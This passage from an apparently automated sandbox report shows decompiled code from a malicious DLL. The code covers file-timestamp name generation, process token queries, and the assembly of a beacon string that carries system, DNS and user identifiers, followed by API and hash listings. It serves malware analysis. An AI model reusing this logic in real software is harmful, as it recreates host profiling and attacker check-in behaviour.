                                          					if(_t5 == 0) {
                                          						break;
                                          					}
                                          					_t11 = _t11 - 0x64;
                                          					if(_t11 > 0) {
                                          						continue;
                                          					}
                                          					break;
                                          				}
                                          				_t6 =  *0x435d26c; // 0x3d0
                                          				if(_t6 != 0) {
                                          					CloseHandle(_t6);
                                          				}
                                          				_t7 =  *0x435d238; // 0x6480000
                                          				if(_t7 != 0) {
                                          					HeapDestroy(_t7);
                                          				}
                                          				goto L8;
                                          			}









                                          APIs
                                          • SetEvent.KERNEL32(000003D0,00000001,04356F2D), ref: 043578B8
                                          • SleepEx.KERNEL32(00000064,00000001), ref: 043578C7
                                          • CloseHandle.KERNEL32(000003D0), ref: 043578E8
                                          • HeapDestroy.KERNEL32(06480000), ref: 043578F8
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: CloseDestroyEventHandleHeapSleep
                                          • String ID:
                                          • API String ID: 4109453060-0
                                          • Opcode ID: a0468ef5911ad6cb3ea5e11e47bf8cfe356eee6aa6c059c71d71801730fbd84c
                                          • Instruction ID: 4638678157395b3d5f064eff6e078a8c64da51d9bf6c5edd756a18c6f26cf014
                                          • Opcode Fuzzy Hash: a0468ef5911ad6cb3ea5e11e47bf8cfe356eee6aa6c059c71d71801730fbd84c
                                          • Instruction Fuzzy Hash: 84F03071A0131197E7105A75E949F667B9DEB0D761F147510BC04D7690DF38EC40D6A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			E04359B10() {
                                          				void* _v0;
                                          				void** _t3;
                                          				void** _t5;
                                          				void** _t7;
                                          				void** _t8;
                                          				void* _t10;
                                          
                                          				_t3 =  *0x435d324; // 0x68795b0
                                          				__imp__( &(_t3[0x10]));
                                          				while(1) {
                                          					_t5 =  *0x435d324; // 0x68795b0
                                          					_t1 =  &(_t5[0x16]); // 0x0
                                          					if( *_t1 == 0) {
                                          						break;
                                          					}
                                          					Sleep(0xa);
                                          				}
                                          				_t7 =  *0x435d324; // 0x68795b0
                                          				_t10 =  *_t7;
                                          				if(_t10 != 0 && _t10 != 0x435e845) {
                                          					HeapFree( *0x435d238, 0, _t10);
                                          					_t7 =  *0x435d324; // 0x68795b0
                                          				}
                                          				 *_t7 = _v0;
                                          				_t8 =  &(_t7[0x10]);
                                          				__imp__(_t8);
                                          				return _t8;
                                          			}










                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(06879570), ref: 04359B19
                                          • Sleep.KERNEL32(0000000A,?,?,?,04354A8B,?,?,?,4D283A53,?,?), ref: 04359B23
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,04354A8B,?,?,?,4D283A53,?,?), ref: 04359B51
                                          • RtlLeaveCriticalSection.NTDLL(06879570), ref: 04359B66
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                          • String ID:
                                          • API String ID: 58946197-0
                                          • Opcode ID: 448faf4a93e84f0e7fa0d4e911cfa32dc70abad128fb02012fa6c799a51962f1
                                          • Instruction ID: 4eba4afd74392ca6bd3a1f3cc9c1c57af4a48666da6be2f6d437dafc08d70f9c
                                          • Opcode Fuzzy Hash: 448faf4a93e84f0e7fa0d4e911cfa32dc70abad128fb02012fa6c799a51962f1
                                          • Instruction Fuzzy Hash: C3F062B4601300DBEB189B64EA59F2937EDEB1C705F45B018E906DB660D628EC40DA15
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E04356B6E(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                          				intOrPtr* _v8;
                                          				void* _t17;
                                          				intOrPtr* _t22;
                                          				void* _t27;
                                          				char* _t30;
                                          				void* _t33;
                                          				void* _t34;
                                          				void* _t36;
                                          				void* _t37;
                                          				void* _t39;
                                          				int _t42;
                                          
                                          				_t17 = __eax;
                                          				_t37 = 0;
                                          				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                          				_t2 = _t17 + 1; // 0x1
                                          				_t28 = _t2;
                                          				_t34 = E043558BE(_t2);
                                          				if(_t34 != 0) {
                                          					_t30 = E043558BE(_t28);
                                          					if(_t30 == 0) {
                                          						E0435147E(_t34);
                                          					} else {
                                          						_t39 = _a4;
                                          						_t22 = E0435A8D2(_t39);
                                          						_v8 = _t22;
                                          						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                          							_a4 = _t39;
                                          						} else {
                                          							_t26 = _t22 + 2;
                                          							_a4 = _t22 + 2;
                                          							_t22 = E0435A8D2(_t26);
                                          							_v8 = _t22;
                                          						}
                                          						if(_t22 == 0) {
                                          							__imp__(_t34, _a4);
                                          							 *_t30 = 0x2f;
                                          							 *((char*)(_t30 + 1)) = 0;
                                          						} else {
                                          							_t42 = _t22 - _a4;
                                          							memcpy(_t34, _a4, _t42);
                                          							 *((char*)(_t34 + _t42)) = 0;
                                          							__imp__(_t30, _v8);
                                          						}
                                          						 *_a8 = _t34;
                                          						_t37 = 1;
                                          						 *_a12 = _t30;
                                          					}
                                          				}
                                          				return _t37;
                                          			}















                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,0435A006,?,?,?,?,00000102,043566AF,?,?,00000000), ref: 04356B7A
                                            • Part of subcall function 043558BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04351C51), ref: 043558CA
                                            • Part of subcall function 0435A8D2: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04356BA8,00000000,00000001,00000001,?,?,0435A006,?,?,?,?,00000102), ref: 0435A8E0
                                            • Part of subcall function 0435A8D2: StrChrA.SHLWAPI(?,0000003F,?,?,0435A006,?,?,?,?,00000102,043566AF,?,?,00000000,00000000), ref: 0435A8EA
                                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0435A006,?,?,?,?,00000102,043566AF,?), ref: 04356BD8
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04356BE8
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04356BF4
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                          • String ID:
                                          • API String ID: 3767559652-0
                                          • Opcode ID: 411a39a76719e9fa5e9ef66678c7302f0b71eb0d2da46c436d33bf09056fabc0
                                          • Instruction ID: 8227fc0c148a7eec0c869edc0ce8f1fc9618b2bb01ef2aca622e7fd8ce1ca59e
                                          • Opcode Fuzzy Hash: 411a39a76719e9fa5e9ef66678c7302f0b71eb0d2da46c436d33bf09056fabc0
                                          • Instruction Fuzzy Hash: 9221D272A00255BFDB125FB5C845EAE7FBCEF05394F45A050FD089B221EB35EA4097A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E04355FCB(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                          				void* _v8;
                                          				void* _t18;
                                          				int _t25;
                                          				int _t29;
                                          				int _t34;
                                          
                                          				_t29 = lstrlenW(_a4);
                                          				_t25 = lstrlenW(_a8);
                                          				_t18 = E043558BE(_t25 + _t29 + _t25 + _t29 + 2);
                                          				_v8 = _t18;
                                          				if(_t18 != 0) {
                                          					_t34 = _t29 + _t29;
                                          					memcpy(_t18, _a4, _t34);
                                          					_t10 = _t25 + 2; // 0x2
                                          					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                          				}
                                          				return _v8;
                                          			}









                                          APIs
                                          • lstrlenW.KERNEL32(004F0053,?,75145520,00000008,0687937C,?,0435694E,004F0053,0687937C,?,?,?,?,?,?,04359C10), ref: 04355FDB
                                          • lstrlenW.KERNEL32(0435694E,?,0435694E,004F0053,0687937C,?,?,?,?,?,?,04359C10), ref: 04355FE2
                                            • Part of subcall function 043558BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04351C51), ref: 043558CA
                                          • memcpy.NTDLL(00000000,004F0053,751469A0,?,?,0435694E,004F0053,0687937C,?,?,?,?,?,?,04359C10), ref: 04356002
                                          • memcpy.NTDLL(751469A0,0435694E,00000002,00000000,004F0053,751469A0,?,?,0435694E,004F0053,0687937C), ref: 04356015
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp Download File
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlenmemcpy$AllocateHeap
                                          • String ID:
                                          • API String ID: 2411391700-0
                                          • Opcode ID: aeda8b3d01aed6d326c80c60bf56b3f5661713d188e339163f5cd04acf07c265
                                          • Instruction ID: b2c29353c8b53d8139bca4383e5241251b99a1064a8543204a42a1f000dc073d
                                          • Opcode Fuzzy Hash: aeda8b3d01aed6d326c80c60bf56b3f5661713d188e339163f5cd04acf07c265
                                          • Instruction Fuzzy Hash: FCF03C72900118BB9B11DFA8CC85C9F7BACEF082587054062AD08D7211E635EA109BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlen.KERNEL32(?,00000000,00000000,04355335,616D692F,00000000), ref: 04359DFB
                                          • lstrlen.KERNEL32(?), ref: 04359E03
                                            • Part of subcall function 043558BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04351C51), ref: 043558CA
                                          • lstrcpy.KERNEL32(00000000,?), ref: 04359E1A
                                          • lstrcat.KERNEL32(00000000,?), ref: 04359E25
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.339273504.0000000004351000.00000020.00020000.sdmp, Offset: 04350000, based on PE: true
                                          • Associated: 00000010.00000002.339261835.0000000004350000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339284826.000000000435C000.00000002.00020000.sdmp
                                          • Associated: 00000010.00000002.339294621.000000000435D000.00000004.00020000.sdmp
                                          • Associated: 00000010.00000002.339308893.000000000435F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_4350000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                          • String ID:
                                          • API String ID: 74227042-0
                                          • Opcode ID: 0618a5e5eac659fb3e84d917877249235efa9751f9da58d91b2369075c261611
                                          • Instruction ID: 10199afa654ce053a57db7beef83ca3ac3647f9f5a42474b78ec55fd0330fbf9
                                          • Opcode Fuzzy Hash: 0618a5e5eac659fb3e84d917877249235efa9751f9da58d91b2369075c261611
                                          • Instruction Fuzzy Hash: 76E09A33805721AB8B626BA4AC08C9FBBADFF8D320B046816FA1083124CB35DC10CBD1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Executed Functions

                                          Control-flow Graph

                                          C-Code - Quality: 93%
                                          			E067732BA(signed char* __eax, intOrPtr* _a4) {
                                          				signed int _v12;
                                          				void* _v16;
                                          				CHAR* _v20;
                                          				struct _FILETIME _v28;
                                          				void* _v32;
                                          				void* _v36;
                                          				char* _v40;
                                          				signed int _v44;
                                          				long _v344;
                                          				struct _WIN32_FIND_DATAA _v368;
                                          				signed int _t72;
                                          				void* _t74;
                                          				signed int _t76;
                                          				void* _t78;
                                          				intOrPtr _t81;
                                          				CHAR* _t83;
                                          				void* _t85;
                                          				signed char _t89;
                                          				signed char _t91;
                                          				intOrPtr _t93;
                                          				void* _t96;
                                          				long _t99;
                                          				int _t101;
                                          				signed int _t109;
                                          				char* _t111;
                                          				void* _t113;
                                          				int _t119;
                                          				char _t128;
                                          				void* _t134;
                                          				signed int _t136;
                                          				char* _t139;
                                          				signed int _t140;
                                          				char* _t141;
                                          				char* _t146;
                                          				signed char* _t148;
                                          				int _t151;
                                          				void* _t152;
                                          				void* _t153;
                                          				void* _t154;
                                          				void* _t165;
                                          
                                          				_v12 = _v12 & 0x00000000;
                                          				_t148 = __eax;
                                          				_t72 =  *0x677d2a0; // 0x59935a40
                                          				_t74 = RtlAllocateHeap( *0x677d238, 0, _t72 ^ 0x59935b44);
                                          				_v20 = _t74;
                                          				if(_t74 == 0) {
                                          					L36:
                                          					return _v12;
                                          				}
                                          				_t76 =  *0x677d2a0; // 0x59935a40
                                          				_t78 = RtlAllocateHeap( *0x677d238, 0, _t76 ^ 0x59935a4d);
                                          				_t146 = 0;
                                          				_v36 = _t78;
                                          				if(_t78 == 0) {
                                          					L35:
                                          					HeapFree( *0x677d238, _t146, _v20);
                                          					goto L36;
                                          				}
                                          				_t136 =  *0x677d2a0; // 0x59935a40
                                          				memset(_t78, 0, _t136 ^ 0x59935a4d);
                                          				_t81 =  *0x677d2a4; // 0x4ca5a8
                                          				_t154 = _t153 + 0xc;
                                          				_t5 = _t81 + 0x677e7e8; // 0x73797325
                                          				_t83 = E067777E6(_t5);
                                          				_v20 = _t83;
                                          				if(_t83 == 0) {
                                          					L34:
                                          					HeapFree( *0x677d238, _t146, _v36);
                                          					goto L35;
                                          				}
                                          				_t134 = 0xffffffffffffffff;
                                          				_v28.dwLowDateTime = 0x59935a4d;
                                          				_v28.dwHighDateTime = 0x59935a4d;
                                          				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                          				_v32 = _t85;
                                          				if(_t85 != 0x59935a4d) {
                                          					GetFileTime(_t85,  &_v28, 0, 0);
                                          					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
                                          					asm("adc dword [ebp-0x14], 0xc9"); // executed
                                          					FindCloseChangeNotification(_v32); // executed
                                          				}
                                          				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
                                          				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
                                          				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
                                          				 *_t148 = _t91;
                                          				_v32 = _t91 & 0x000000ff;
                                          				_t93 =  *0x677d2a4; // 0x4ca5a8
                                          				_t16 = _t93 + 0x677e809; // 0x642e2a5c
                                          				_v40 = _t146;
                                          				_v44 = _t89 & 0x000000ff;
                                          				__imp__(_v20, _t16);
                                          				_t96 = FindFirstFileA(_v20,  &_v368); // executed
                                          				_v16 = _t96;
                                          				if(_t96 == _t134) {
                                          					_t146 = 0;
                                          					goto L34;
                                          				}
                                          				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                                          				while(_t99 > 0) {
                                          					_t101 = FindNextFileA(_v16,  &_v368); // executed
                                          					if(_t101 == 0) {
                                          						FindClose(_v16);
                                          						_v16 = FindFirstFileA(_v20,  &_v368);
                                          						_v28.dwHighDateTime = _v344;
                                          						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
                                          					}
                                          					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                                          				}
                                          				_v12 = _v12 & 0x00000000;
                                          				while(1) {
                                          					_t109 = _v44;
                                          					if(_v12 <= _t109) {
                                          						goto L15;
                                          					}
                                          					_t140 = _v12;
                                          					if(_t140 > _v32) {
                                          						_t141 = _v36;
                                          						 *_a4 = _t141;
                                          						while(1) {
                                          							_t128 =  *_t141;
                                          							if(_t128 == 0) {
                                          								break;
                                          							}
                                          							if(_t128 < 0x30) {
                                          								 *_t141 = _t128 + 0x20;
                                          							}
                                          							_t141 = _t141 + 1;
                                          						}
                                          						_v12 = 1;
                                          						FindClose(_v16); // executed
                                          						_t146 = 0;
                                          						goto L35;
                                          					}
                                          					_t165 = _t140 - _t109;
                                          					L15:
                                          					if(_t165 == 0 || _v12 == _v32) {
                                          						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
                                          						_t139 = _v40;
                                          						_t151 = _t111 -  &(_v368.cFileName);
                                          						_t113 = 0;
                                          						if(_t139 != 0) {
                                          							_t48 = _t151 - 4; // -4
                                          							_t113 = _t48;
                                          							if(_t113 > _t151) {
                                          								_t113 = 0;
                                          							}
                                          						}
                                          						if(_t151 > 4) {
                                          							_t151 = 4;
                                          						}
                                          						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
                                          						_t154 = _t154 + 0xc;
                                          						_v40 =  &(_v40[_t151]);
                                          					}
                                          					do {
                                          						_t119 = FindNextFileA(_v16,  &_v368); // executed
                                          						if(_t119 == 0) {
                                          							FindClose(_v16);
                                          							_v16 = FindFirstFileA(_v20,  &_v368);
                                          						}
                                          					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
                                          					_v12 = _v12 + 1;
                                          				}
                                          			}

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,59935A40,00000000), ref: 067732E5
                                          • RtlAllocateHeap.NTDLL(00000000,59935A40), ref: 06773307
                                          • memset.NTDLL ref: 06773321
                                            • Part of subcall function 067777E6: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,59935A4D,0677333A,73797325), ref: 067777F7
                                            • Part of subcall function 067777E6: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 06777811
                                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 0677335F
                                          • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 06773373
                                          • FindCloseChangeNotification.KERNEL32(00000000), ref: 0677338A
                                          • StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 06773396
                                          • lstrcat.KERNEL32(?,642E2A5C), ref: 067733D7
                                          • FindFirstFileA.KERNEL32(?,?), ref: 067733ED
                                          • CompareFileTime.KERNEL32(?,?), ref: 0677340B
                                          • FindNextFileA.KERNELBASE(0677207E,?), ref: 0677341F
                                          • FindClose.KERNEL32(0677207E), ref: 0677342C
                                          • FindFirstFileA.KERNEL32(?,?), ref: 06773438
                                          • CompareFileTime.KERNEL32(?,?), ref: 0677345A
                                          • StrChrA.SHLWAPI(?,0000002E), ref: 0677348D
                                          • memcpy.NTDLL(00000000,?,00000000), ref: 067734C6
                                          • FindNextFileA.KERNELBASE(0677207E,?), ref: 067734DB
                                          • FindClose.KERNEL32(0677207E), ref: 067734E8
                                          • FindFirstFileA.KERNEL32(?,?), ref: 067734F4
                                          • CompareFileTime.KERNEL32(?,?), ref: 06773504
                                          • FindClose.KERNEL32(0677207E), ref: 06773539
                                          • HeapFree.KERNEL32(00000000,00000000,73797325), ref: 0677354B
                                          • HeapFree.KERNEL32(00000000,?), ref: 0677355B
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
                                          • String ID:
                                          • API String ID: 2944988578-0
                                          • Opcode ID: 649b16a0b7ce7a318e12851e105838686ef1ec5b85de54eb8f0d4103486c1f2b
                                          • Instruction ID: 1f0aedad0599d51dbb1c7adfa88bf60f0a4925a98cba87fd17ef6a07e806d184
                                          • Opcode Fuzzy Hash: 649b16a0b7ce7a318e12851e105838686ef1ec5b85de54eb8f0d4103486c1f2b
                                          • Instruction Fuzzy Hash: 64815BB1D00219AFDF61DFA4DC84AFEBBB9FF48310F14846AE605E6250D7319A45DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 38%
                                          			E067771B9(char _a4, void* _a8) {
                                          				void* _v8;
                                          				void* _v12;
                                          				char _v16;
                                          				void* _v20;
                                          				char _v24;
                                          				char _v28;
                                          				char _v32;
                                          				char _v36;
                                          				char _v40;
                                          				void* _v44;
                                          				void** _t33;
                                          				void* _t40;
                                          				void* _t43;
                                          				void** _t44;
                                          				intOrPtr* _t47;
                                          				char _t48;
                                          
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_v20 = _a4;
                                          				_t48 = 0;
                                          				_v16 = 0;
                                          				_a4 = 0;
                                          				_v44 = 0x18;
                                          				_v40 = 0;
                                          				_v32 = 0;
                                          				_v36 = 0;
                                          				_v28 = 0;
                                          				_v24 = 0;
                                          				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                          					_t33 =  &_v8;
                                          					__imp__(_v12, 8, _t33);
                                          					if(_t33 >= 0) {
                                          						_t47 = __imp__;
                                          						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                          						_t44 = E067758BE(_a4);
                                          						if(_t44 != 0) {
                                          							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                          							if(_t40 >= 0) {
                                          								memcpy(_a8,  *_t44, 0x1c);
                                          								_t48 = 1;
                                          							}
                                          							E0677147E(_t44);
                                          						}
                                          						NtClose(_v8); // executed
                                          					}
                                          					NtClose(_v12);
                                          				}
                                          				return _t48;
                                          			}

                                          APIs
                                          • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 06777200
                                          • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 06777213
                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 0677722F
                                            • Part of subcall function 067758BE: RtlAllocateHeap.NTDLL(00000000,-00000008,06771C51), ref: 067758CA
                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 0677724C
                                          • memcpy.NTDLL(?,00000000,0000001C), ref: 06777259
                                          • NtClose.NTDLL(?), ref: 0677726B
                                          • NtClose.NTDLL(00000000), ref: 06777275
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.346328294.0000000006771000.00000020.00020000.sdmp, Offset: 06770000, based on PE: true
                                          • Associated: 00000012.00000002.346318184.0000000006770000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346339984.000000000677C000.00000002.00020000.sdmp
                                          • Associated: 00000012.00000002.346346906.000000000677D000.00000004.00020000.sdmp
                                          • Associated: 00000012.00000002.346355523.000000000677F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_18_2_6770000_rundll32.jbxd
                                          Similarity
                                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                          • String ID:
                                          • API String ID: 2575439697-0
                                          • Opcode ID: 782db14ab2c4194128e1194a9c86b8d1044118d2e07c0cbc300808558b4b4660
                                          • Instruction ID: 901c69390e71ab24b3b94ac2b7f3bfed5fab3f77b4275e166dc2b55e2deb0036
                                          • Opcode Fuzzy Hash: 782db14ab2c4194128e1194a9c86b8d1044118d2e07c0cbc300808558b4b4660
                                          • Instruction Fuzzy Hash: DA21E5B2900218BFEF41DF95CD899DEBFBDEB18740F108026FA10E6154D7719A44DBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 74%
                                          			E06771754(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
                                          				void* _v8;
                                          				signed int _v12;
                                          				void* _v16;
                                          				void* _v20;
                                          				void* _v24;
                                          				void* _v28;
                                          				void* __ebx;
                                          				void* __edi;
                                          				long _t60;
                                          				intOrPtr _t61;
                                          				intOrPtr _t62;
                                          				intOrPtr _t63;
                                          				intOrPtr _t64;
                                          				intOrPtr _t65;
                                          				void* _t68;
                                          				intOrPtr _t69;
                                          				int _t72;
                                          				void* _t73;
                                          				void* _t74;
                                          				void* _t76;
                                          				void* _t79;
                                          				intOrPtr _t83;
                                          				intOrPtr _t87;
                                          				intOrPtr* _t89;
                                          				intOrPtr _t95;
                                          				void* _t97;
                                          				intOrPtr _t104;
                                          				signed int _t108;
                                          				char** _t110;
                                          				int _t113;
                                          				signed int _t115;
                                          				intOrPtr* _t116;
                                          				intOrPtr* _t118;
                                          				intOrPtr* _t120;
                                          				intOrPtr* _t122;
                                          				intOrPtr _t125;
                                          				intOrPtr _t130;
                                          				int _t134;
                                          				CHAR* _t136;
                                          				intOrPtr _t137;
                                          				void* _t138;
                                          				void* _t147;
                                          				int _t148;
                                          				void* _t149;
                                          				intOrPtr _t150;
                                          				void* _t152;
                                          				long _t156;
                                          				intOrPtr* _t157;
                                          				intOrPtr* _t158;
                                          				intOrPtr* _t161;
                                          				void* _t162;
                                          				void* _t164;
                                          
                                          				_t147 = __edx;
                                          				_t138 = __ecx;
                                          				_t60 = __eax;
                                          				_v12 = 8;
                                          				if(__eax == 0) {
                                          					_t60 = GetTickCount();
                                          				}
                                          				_t61 =  *0x677d018; // 0x3df0b315
                                          				asm("bswap eax");
                                          				_t62 =  *0x677d014; // 0x3a87c8cd
                                          				_t136 = _a16;
                                          				asm("bswap eax");
                                          				_t63 =  *0x677d010; // 0xd8d2f808
                                          				asm("bswap eax");
                                          				_t64 =  *0x677d00c; // 0x8f8f86c2
                                          				asm("bswap eax");
                                          				_t65 =  *0x677d2a4; // 0x4ca5a8
                                          				_t3 = _t65 + 0x677e633; // 0x74666f73
                                          				_t148 = wsprintfA(_t136, _t3, 3, 0x3d137, _t64, _t63, _t62, _t61,  *0x677d02c,  *0x677d004, _t60);
                                          				_t68 = E067757AB();
                                          				_t69 =  *0x677d2a4; // 0x4ca5a8
                                          				_t4 = _t69 + 0x677e673; // 0x74707526
                                          				_t72 = wsprintfA(_t148 + _t136, _t4, _t68);
                                          				_t164 = _t162 + 0x38;
                                          				_t149 = _t148 + _t72; // executed
                                          				_t73 = E067773E9(_t138); // executed
                                          				_t137 = __imp__;
                                          				_v8 = _t73;
                                          				if(_t73 != 0) {
                                          					_t130 =  *0x677d2a4; // 0x4ca5a8
                                          					_t7 = _t130 + 0x677e8cb; // 0x736e6426
                                          					_t134 = wsprintfA(_a16 + _t149, _t7, _t73);
                                          					_t164 = _t164 + 0xc;
                                          					_t149 = _t149 + _t134;
                                          					HeapFree( *0x677d238, 0, _v8);
                                          				}
                                          				_t74 = E0677614A();
                                          				_v8 = _t74;
                                          				if(_t74 != 0) {
                                          					_t125 =  *0x677d2a4; // 0x4ca5a8
                                          					_t11 = _t125 + 0x677e8d3; // 0x6f687726
                                          					wsprintfA(_t149 + _a16, _t11, _t74);
                                          					_t164 = _t164 + 0xc;
                                          					HeapFree( *0x677d238, 0, _v8);
                                          				}
                                          				_t150 =  *0x677d324; // 0x6c495b0
                                          				_t76 = E0677757B(0x677d00a, _t150 + 4);
                                          				_t156 = 0;
                                          				_v20 = _t76;
                                          				if(_t76 == 0) {
                                          					L26:
                                          					HeapFree( *0x677d238, _t156, _a16);
                                          					return _v12;
                                          				} else {
                                          					_t79 = RtlAllocateHeap( *0x677d238, 0, 0x800);
                                          					_v8 = _t79;
                                          					if(_t79 == 0) {
                                          						L25:
                                          						HeapFree( *0x677d238, _t156, _v20);
                                          						goto L26;
                                          					}
                                          					E0677749F(GetTickCount());
                                          					_t83 =  *0x677d324; // 0x6c495b0
                                          					__imp__(_t83 + 0x40);
                                          					asm("lock xadd [eax], ecx");
                                          					_t87 =  *0x677d324; // 0x6c495b0
                                          					__imp__(_t87 + 0x40);
                                          					_t89 =  *0x677d324; // 0x6c495b0
                                          					_t152 = E06774D2C(1, _t147, _a16,  *_t89);
                                          					_v28 = _t152;
                                          					asm("lock xadd [eax], ecx");
                                          					if(_t152 == 0) {
                                          						L24:
                                          						HeapFree( *0x677d238, _t156, _v8);
                                          						goto L25;
                                          					}
                                          					StrTrimA(_t152, 0x677c294);
                                          					_t95 =  *0x677d2a4; // 0x4ca5a8
                                          					_push(_t152);
                                          					_t18 = _t95 + 0x677e252; // 0x616d692f
